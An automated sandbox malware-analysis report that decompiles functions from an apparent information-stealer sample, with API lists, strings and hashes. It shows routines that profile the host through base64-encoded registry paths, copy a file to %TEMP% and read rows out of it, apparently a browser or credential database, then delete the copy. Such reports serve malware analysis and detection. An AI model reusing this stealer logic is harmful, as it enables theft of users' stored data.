                                                                                                    Function 00416748 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E00416748(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr _t119;

				_t116 = __esi;
				_t115 = __edi;
				_t118 = _t119;
				_t91 = 0xb;
				do {
					_push(0);
					_push(0);
					_t91 = _t91 - 1;
					_t120 = _t91;
				} while (_t91 != 0);
				_t90 = __eax;
				_push(_t118);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t90);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t92);
				E00407500(0x80000002, _t90, _t92, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t90);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v72);
				_push( *_t90);
				_push("GetRAM: ");
				E00416584( &_v88, _t90, _t116, _t120);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t90);
				_push("Video Info\r\n");
				E00416644( &_v92, _t90, _t115, _t116);
				_push(_v92);
				E00403850();
				_t111 = 0x4169ac;
				 *[fs:eax] = _t111;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}























                                                                                                    0x00416748
                                                                                                    0x00416748
                                                                                                    0x00416749
                                                                                                    0x0041674b
                                                                                                    0x00416750
                                                                                                    0x00416750
                                                                                                    0x00416752
                                                                                                    0x00416754
                                                                                                    0x00416754
                                                                                                    0x00416754
                                                                                                    0x00416758
                                                                                                    0x0041675c
                                                                                                    0x0041675d
                                                                                                    0x00416762
                                                                                                    0x00416765
                                                                                                    0x0041676c
                                                                                                    0x00416776
                                                                                                    0x0041677b
                                                                                                    0x0041677e
                                                                                                    0x00416783
                                                                                                    0x00416788
                                                                                                    0x00416791
                                                                                                    0x0041679c
                                                                                                    0x004167a4
                                                                                                    0x004167ad
                                                                                                    0x004167b8
                                                                                                    0x004167c5
                                                                                                    0x004167c6
                                                                                                    0x004167cb
                                                                                                    0x004167ce
                                                                                                    0x004167db
                                                                                                    0x004167e5
                                                                                                    0x004167f4
                                                                                                    0x004167ff
                                                                                                    0x00416804
                                                                                                    0x0041680d
                                                                                                    0x00416812
                                                                                                    0x00416815
                                                                                                    0x00416822
                                                                                                    0x0041682c
                                                                                                    0x00416831
                                                                                                    0x00416833
                                                                                                    0x0041683b
                                                                                                    0x00416840
                                                                                                    0x00416843
                                                                                                    0x0041684f
                                                                                                    0x00416854
                                                                                                    0x00416856
                                                                                                    0x0041685e
                                                                                                    0x00416863
                                                                                                    0x00416872
                                                                                                    0x00416879
                                                                                                    0x0041687c
                                                                                                    0x0041687f
                                                                                                    0x0041688c
                                                                                                    0x00416894
                                                                                                    0x0041689c
                                                                                                    0x004168a9
                                                                                                    0x004168b1
                                                                                                    0x004168b9
                                                                                                    0x004168c1
                                                                                                    0x004168d3

                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$InfoSystem
                                                                                                    • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                    • API String ID: 4070941872-1038824218
                                                                                                    • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                    • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
                                                                                                    • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                    • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403368 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 79%
                                                                                                    			E00403368(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x41c034 == 0) {
					if( *0x41b024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
						 *0x41c220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
				}
			}





                                                                                                    0x00403370
                                                                                                    0x004033d0
                                                                                                    0x004033e0
                                                                                                    0x004033e0
                                                                                                    0x004033e6
                                                                                                    0x00403372
                                                                                                    0x0040337b
                                                                                                    0x0040338b
                                                                                                    0x0040338b
                                                                                                    0x004033a7
                                                                                                    0x004033c8
                                                                                                    0x004033c8

                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E), ref: 004033A7
                                                                                                    • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033BC
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E), ref: 004033C2
                                                                                                    • MessageBoxA.USER32 ref: 004033E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                    • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                    • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                                                                                                    • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                    • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402668 Relevance: 11.4, APIs: 9, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00402668(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00403AC0(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                                                    0x0040266c
                                                                                                    0x0040266e
                                                                                                    0x0040267a
                                                                                                    0x0040267a
                                                                                                    0x0040267a
                                                                                                    0x0040267e
                                                                                                    0x00402678
                                                                                                    0x00402678
                                                                                                    0x0040267a
                                                                                                    0x0040267a
                                                                                                    0x0040267e
                                                                                                    0x00402678
                                                                                                    0x00402678
                                                                                                    0x00402684
                                                                                                    0x00402687
                                                                                                    0x00402694
                                                                                                    0x00402696
                                                                                                    0x004026dd
                                                                                                    0x004026dd
                                                                                                    0x004026e1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040269c
                                                                                                    0x004026d0
                                                                                                    0x004026d9
                                                                                                    0x004026db
                                                                                                    0x00000000
                                                                                                    0x004026db
                                                                                                    0x004026a4
                                                                                                    0x004026b6
                                                                                                    0x004026b6
                                                                                                    0x004026ba
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004026a9
                                                                                                    0x004026b2
                                                                                                    0x004026b4
                                                                                                    0x004026b4
                                                                                                    0x004026c3
                                                                                                    0x004026cb
                                                                                                    0x004026cb
                                                                                                    0x004026c3
                                                                                                    0x004026e7
                                                                                                    0x004026ec
                                                                                                    0x004026ee
                                                                                                    0x004026f0
                                                                                                    0x00402745
                                                                                                    0x00402745
                                                                                                    0x00402749
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004026f6
                                                                                                    0x00402731
                                                                                                    0x00402738
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040273a
                                                                                                    0x0040273a
                                                                                                    0x0040273c
                                                                                                    0x0040273f
                                                                                                    0x00402740
                                                                                                    0x00402741
                                                                                                    0x00000000
                                                                                                    0x0040273a
                                                                                                    0x004026fe
                                                                                                    0x00402717
                                                                                                    0x00402717
                                                                                                    0x0040271b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402703
                                                                                                    0x0040270a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040270c
                                                                                                    0x0040270c
                                                                                                    0x0040270e
                                                                                                    0x00402711
                                                                                                    0x00402712
                                                                                                    0x00402713
                                                                                                    0x0040270c
                                                                                                    0x00402724
                                                                                                    0x0040272c
                                                                                                    0x0040272c
                                                                                                    0x00402724
                                                                                                    0x00402751
                                                                                                    0x0040268f
                                                                                                    0x0040268f
                                                                                                    0x00000000
                                                                                                    0x0040268f
                                                                                                    0x00402687

                                                                                                    APIs
                                                                                                    • CharNextA.USER32(00000000), ref: 0040269F
                                                                                                    • CharNextA.USER32(00000000), ref: 004026A9
                                                                                                    • CharNextA.USER32(00000000), ref: 004026C6
                                                                                                    • CharNextA.USER32(00000000), ref: 004026D0
                                                                                                    • CharNextA.USER32(00000000), ref: 004026F9
                                                                                                    • CharNextA.USER32(00000000), ref: 00402703
                                                                                                    • CharNextA.USER32(00000000), ref: 00402727
                                                                                                    • CharNextA.USER32(00000000), ref: 00402731
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CharNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 3213498283-0
                                                                                                    • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                    • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
                                                                                                    • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                    • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410E70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 45%
                                                                                                    			E00410E70(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t87;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t110;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t155;
				intOrPtr* _t159;
				void* _t161;
				intOrPtr* _t166;
				intOrPtr* _t172;
				intOrPtr* _t178;
				void* _t180;
				intOrPtr* _t184;
				void* _t187;
				intOrPtr _t208;
				intOrPtr _t210;
				void* _t216;
				intOrPtr _t222;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t228;
				void* _t229;

				_t224 = __esi;
				_t186 = __ebx;
				_t226 = _t227;
				_t187 = 0xb;
				do {
					_push(0);
					_push(0);
					_t187 = _t187 - 1;
					_t234 = _t187;
				} while (_t187 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t226);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00403B80( &_v28);
				_push(_t226);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t234);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t234);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t186,  &_v40, _t234);
				E004062D8(L"%TEMP%",  &_v64, _t234);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t186,  &_v44, _t234);
				_t87 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t87, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t186, _t187,  &_v36, _t224, _t234);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t186, _t187) != 0) {
					_t102 =  *0x41b55c; // 0x41c784
					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
					_t228 = _t227 + 8;
					__eflags = _t104;
					if(_t104 == 0) {
						E00408120(0x66,  &_v76);
						_t147 =  *0x41b5cc; // 0x41c78c
						_t149 =  *((intOrPtr*)( *_t147))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t229 = _t228 + 0x14;
						__eflags = _t149;
						if(_t149 == 0) {
							while(1) {
								_t151 =  *0x41b600; // 0x41c790
								_t153 =  *((intOrPtr*)( *_t151))(_v20);
								__eflags = _t153 - 0x64;
								if(_t153 != 0x64) {
									goto L9;
								}
								_t155 =  *0x41b644; // 0x41c798
								_t159 =  *0x41b588; // 0x41c794
								_t161 =  *((intOrPtr*)( *_t159))(_v20, 3,  *((intOrPtr*)( *_t155))(_v20, 3));
								_pop(_t216);
								E004094C4(_t161,  &_v48, _t216);
								E00403D2C( &_v80, _v48);
								_t166 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t166))(_v20, 0, 0x4111a4, _v80, _v28));
								_t172 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t172))(_v20, 1, 0x4111a4, _v84));
								_t178 =  *0x41b588; // 0x41c794
								_t180 =  *((intOrPtr*)( *_t178))(_v20, 2, 0x4111b0, _v88);
								_t229 = _t229 + 0x28;
								E00403C98( &_v92, _t180);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t184 =  *0x41b584; // 0x41b0b4
								 *_t184 =  *_t184 + 1;
								__eflags =  *_t184;
							}
						}
					}
					L9:
					_t106 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t106))(_v20);
					_t110 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t110))(_v16);
					_pop(_t208);
					 *[fs:eax] = _t208;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t222);
					 *[fs:eax] = _t222;
				}
				_pop(_t210);
				 *[fs:eax] = _t210;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}



















































                                                                                                    0x00410e70
                                                                                                    0x00410e70
                                                                                                    0x00410e71
                                                                                                    0x00410e73
                                                                                                    0x00410e78
                                                                                                    0x00410e78
                                                                                                    0x00410e7a
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7f
                                                                                                    0x00410e80
                                                                                                    0x00410e81
                                                                                                    0x00410e82
                                                                                                    0x00410e85
                                                                                                    0x00410e8b
                                                                                                    0x00410e92
                                                                                                    0x00410e93
                                                                                                    0x00410e98
                                                                                                    0x00410e9b
                                                                                                    0x00410ea1
                                                                                                    0x00410ea8
                                                                                                    0x00410ea9
                                                                                                    0x00410eae
                                                                                                    0x00410eb1
                                                                                                    0x00410ebc
                                                                                                    0x00410ec1
                                                                                                    0x00410ec7
                                                                                                    0x00410ecc
                                                                                                    0x00410ecf
                                                                                                    0x00410edc
                                                                                                    0x00410ee7
                                                                                                    0x00410ef4
                                                                                                    0x00410ef9
                                                                                                    0x00410efc
                                                                                                    0x00410f01
                                                                                                    0x00410f0c
                                                                                                    0x00410f17
                                                                                                    0x00410f21
                                                                                                    0x00410f30
                                                                                                    0x00410f3b
                                                                                                    0x00410f46
                                                                                                    0x00410f51
                                                                                                    0x00410f60
                                                                                                    0x00410f7c
                                                                                                    0x00410f83
                                                                                                    0x00410f85
                                                                                                    0x00410f88
                                                                                                    0x00410f8a
                                                                                                    0x00410fa2
                                                                                                    0x00410fb4
                                                                                                    0x00410fbb
                                                                                                    0x00410fbd
                                                                                                    0x00410fc0
                                                                                                    0x00410fc2
                                                                                                    0x00411091
                                                                                                    0x00411095
                                                                                                    0x0041109c
                                                                                                    0x0041109f
                                                                                                    0x004110a2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410fd3
                                                                                                    0x00410fe6
                                                                                                    0x00410fed
                                                                                                    0x00410ff5
                                                                                                    0x00410ff6
                                                                                                    0x00411004
                                                                                                    0x00411017
                                                                                                    0x00411028
                                                                                                    0x0041103b
                                                                                                    0x0041104c
                                                                                                    0x0041105f
                                                                                                    0x00411066
                                                                                                    0x00411068
                                                                                                    0x00411070
                                                                                                    0x00411075
                                                                                                    0x00411078
                                                                                                    0x00411085
                                                                                                    0x0041108a
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x00411091
                                                                                                    0x00410fc2
                                                                                                    0x004110a8
                                                                                                    0x004110ac
                                                                                                    0x004110b3
                                                                                                    0x004110ba
                                                                                                    0x004110c1
                                                                                                    0x004110c6
                                                                                                    0x004110c9
                                                                                                    0x004110de
                                                                                                    0x004110ec
                                                                                                    0x00410f62
                                                                                                    0x00410f64
                                                                                                    0x00410f67
                                                                                                    0x00410f67
                                                                                                    0x004110f3
                                                                                                    0x004110f6
                                                                                                    0x004110f9
                                                                                                    0x00411106
                                                                                                    0x0041110e
                                                                                                    0x00411116
                                                                                                    0x0041111e
                                                                                                    0x0041112b
                                                                                                    0x00411133
                                                                                                    0x00411140
                                                                                                    0x00411148
                                                                                                    0x00411155
                                                                                                    0x00411162

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,004110CE,?,00000000,00411163,?,00000000,0041B0FC,00000000,00000000,00000000,?,004113F1,?,0041156C,?), ref: 00410EB4
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410F30
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 004110EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CopyCountDeleteTick
                                                                                                    • String ID: $%TEMP%$.tmp
                                                                                                    • API String ID: 2381671008-2792595090
                                                                                                    • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                    • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
                                                                                                    • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                    • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410BB8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E00410BB8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t184;
				intOrPtr _t188;
				intOrPtr _t189;
				void* _t190;
				void* _t191;

				_t186 = __esi;
				_t153 = __ebx;
				_t188 = _t189;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t193 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t188);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00403B80( &_v28);
				_push(_t188);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t193);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t193);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t193);
				E004062D8(L"%TEMP%",  &_v60, _t193);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t193);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t186, _t193);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t190 = _t189 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x65,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t191 = _t190 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, E00410E60, _v76);
								_t191 = _t191 + 0x10;
								E00403C98( &_v80, _t148);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t184);
					 *[fs:eax] = _t184;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}










































                                                                                                    0x00410bb8
                                                                                                    0x00410bb8
                                                                                                    0x00410bb9
                                                                                                    0x00410bbb
                                                                                                    0x00410bc0
                                                                                                    0x00410bc0
                                                                                                    0x00410bc2
                                                                                                    0x00410bc4
                                                                                                    0x00410bc4
                                                                                                    0x00410bc4
                                                                                                    0x00410bc7
                                                                                                    0x00410bc8
                                                                                                    0x00410bc9
                                                                                                    0x00410bca
                                                                                                    0x00410bcb
                                                                                                    0x00410bce
                                                                                                    0x00410bd4
                                                                                                    0x00410bdb
                                                                                                    0x00410bdc
                                                                                                    0x00410be1
                                                                                                    0x00410be4
                                                                                                    0x00410bea
                                                                                                    0x00410bf1
                                                                                                    0x00410bf2
                                                                                                    0x00410bf7
                                                                                                    0x00410bfa
                                                                                                    0x00410c05
                                                                                                    0x00410c0a
                                                                                                    0x00410c10
                                                                                                    0x00410c15
                                                                                                    0x00410c18
                                                                                                    0x00410c25
                                                                                                    0x00410c30
